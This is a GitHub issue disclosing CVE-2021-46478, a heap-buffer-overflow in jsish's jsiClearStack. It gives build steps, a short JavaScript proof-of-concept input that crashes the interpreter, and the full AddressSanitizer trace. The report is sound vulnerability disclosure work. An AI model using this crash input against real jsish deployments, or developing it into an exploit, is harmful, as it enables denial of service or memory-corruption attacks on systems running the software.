CVE-2021-46478: Heap-buffer-overflow src/jsiEval.c:120 in jsiClearStack · Issue #60 · pcmacdon/jsish

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 0 comments

Comments

Jsish revision

Commit: 9fa798e

Version: v3.5.0

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

export CFLAGS=’-fsanitize=address’ make

Test case

var a = Math.sin(Math.PI/2);
if (a === 1) { switch (a) { case assert(accessed, ‘accessed !== true’): break; default: throw "FAIL"; } }

​

Execution steps & Output

$ ./jsish/jsish poc.js

==52181==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6250000000f8 at pc 0x55ff51f35d58 bp 0x7fff48257760 sp 0x7fff48257750 READ of size 8 at 0x6250000000f8 thread T0 #0 0x55ff51f35d57 in jsiClearStack src/jsiEval.c:120 #1 0x55ff51f35d57 in jsiPop src/jsiEval.c:200 #2 0x55ff51f35d57 in jsiEvalCodeSub src/jsiEval.c:1390 #3 0x55ff51f4215e in jsi_evalcode src/jsiEval.c:2204 #4 0x55ff51f46274 in jsi_evalStrFile src/jsiEval.c:2665 #5 0x55ff51c3566a in Jsi_Main src/jsiInterp.c:936 #6 0x55ff5243a03a in jsi_main src/main.c:47 #7 0x7fab5e008bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #8 0x55ff51bc9969 in _start (/usr/local/bin/jsish+0xe8969)

0x6250000000f8 is located 8 bytes to the left of 8192-byte region [0x625000000100,0x625000002100) allocated by thread T0 here: #0 0x7fab5ec77f30 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef30) #1 0x55ff51c3a972 in Jsi_Realloc src/jsiUtils.c:47

SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiEval.c:120 in jsiClearStack Shadow bytes around the buggy address: 0x0c4a7fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff8000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c4a7fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa] 0x0c4a7fff8020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff8040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff8050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c4a7fff8060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==52181==ABORTING

Credits: Found by OWL337 team.

1 participant